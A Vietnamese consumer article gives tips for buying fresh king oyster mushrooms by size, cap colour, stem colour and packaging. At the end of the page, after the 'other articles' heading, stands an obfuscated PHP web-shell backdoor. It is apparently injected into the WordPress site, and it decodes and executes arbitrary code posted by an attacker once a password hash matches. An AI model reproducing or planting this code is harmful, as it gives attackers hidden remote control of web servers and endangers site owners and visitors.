4 điều bạn nhất định phải biết khi mua nấm Đùi gà

Nội dung chính

Nấm đùi gà mua cây to hay cây nhỏ thì ngon hơn? Nấm màu trắng hay màu ngà ngà thì tốt hơn?… Hãy đọc bài viết ‘4 điều bạn nhất định phải biết khi mua nấm Đùi gà’ sau đây để hiểu rõ nhé!

Nấm Đùi gà (King Oyster Mushroom) là một trong những lựa chọn tốt cho sức khỏe khi nghĩ đến món lẩu, canh súp hay xào rau củ, đặc biệt là có thể dùng thay thế thịt trong các món chay. Tuy nhiên, phần lớn nhiều người mắc sai lầm khi chọn mua loại nấm này. Cứ nghĩ cây càng to thì càng ngon nhưng đó là sai lầm. Nắm vững bí quyết này, đi chợ hay siêu thị mua 10 cây trúng cả 10 cây ngon.

Kích thước là yếu tố cần quan sát đầu tiên

4 dieu ban nhat dinh phai biet khi mua nam dui ga bac au
Nấm đùi gà Bắc Âu trong phòng nuôi trồng lạnh tại nhà máy ở Buôn Ma Thuột

Nhìn kích thước nấm Đùi gà là cách đơn giản nhất khi chọn mua. Không phải nấm trông càng to hay càng dài thì sẽ ngon. Nấm Đùi gà to và dài không phải cây nào cũng ngon bởi đó là biểu hiện chúng có xu hướng già và phần lõi bên trong dễ bị xốp.

Nhưng nếu nấm Đùi gà trông hình dáng quá ngắn và “tròn lẳn” thì lại chưa phát triển đến độ ngon, hương vị lẫn độ dinh dưỡng đều kém.

Hiện nay, trên thị trường có bán loại nấm Đùi gà baby, chúng nhỏ đều trông có vẻ ngon nhưng ăn nhiều loại sẽ bị nhạt, bạn cần cân nhắc trước khi xuống tiền mua những loại nấm như vậy.

Nấm Đùi gà nếu phát triển đồng đều về chất lượng lẫn hương vị thì thường sẽ có độ dài khoảng 10cm là lý tưởng nhất.

Quan sát màu sắc mũ nấm

Phần mũ nấm Đùi gà sẽ tiết lộ mức độ ngon của nó. Nếu nấm “xịn”, phần mũ nấm sẽ nhẵn và dày, màu nâu đều. Nếu nấm quá già thì mũ nấm bị hở, các nếp gấp xuất hiện trên mũ.

Đặc biệt, nếu nhìn thấy mũ nấm có các chấm đen thì đó là nấm không còn tươi và bạn không nên mua những cây nấm Đùi gà như vậy nhé!

Quan sát màu sắc thân nấm

Thường mọi người thích mua nấm Đùi gà có thân trắng phau, vì nghĩ càng trắng thì càng sạch. Điều này sai lầm đấy. Thân nấm nếu quá trắng thì có thể đã bị dùng thuốc, trong khi nấm được nuôi trồng sạch sẽ có màu trắng sữa ngà ngà như nấm Đùi gà do Bắc Âu Mushrooom nuôi trồng và bán tại Phiên chợ Xanh Tử tế (135A Pasteur, Quận 3, TP.HCM) mỗi cuối tuần.

Còn nếu chúng có màu vàng ngà là do để lâu bị hư hỏng rồi. Hơn nữa, các cây nấm Đùi gà nào khi cầm mà có cảm giác nhớt thì chúng đã bị hỏng thực sự, không được mua về ăn tránh bị ngộ độc.

Ngoài ra, nếu phần thân nấm nhăn và héo, không căng mọng nghĩa là nấm để lâu và đã biến chất. Nên mua những cây nấm thân tròn, căng mọng mới đủ độ tươi.

Quan sát cách đóng gói sản phẩm

Nấm sau khi thu hoạch, đóng gói phải ghi thời gian sử dụng. Đóng gói phải trữ lạnh hoặc theo quy trình bảo quản nhất định. Nếu bạn thấy các gói nấm có nhiều hơi nước đọng bên trong thì tránh mua. Hơi nước đọng lại như vậy do nấm để quá lâu, nấm bị thoát nước ăn không ngon, rất nhạt. Đồng thời, nấm dễ bị vi khuẩn xâm nhập và biến chất.

Với những mẹo nhỏ như trên, chúc bạn chọn mua được đúng sản phẩm nấm Đùi gà thật tươi ngon để chuẩn bị cho bữa ăn của gia đình. Đặc biệt là khi Tết Nguyên Đán đã đến gần, việc lựa chọn thực phẩm tươi sẽ giúp mâm cỗ Tết của bạn ngon hơn đó nha!

Nguồn: Phụ Nữ Việt Nam

Thấy hay thì Share bạn nhé:

Facebook
Twitter
LinkedIn

Các bài viết khác

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}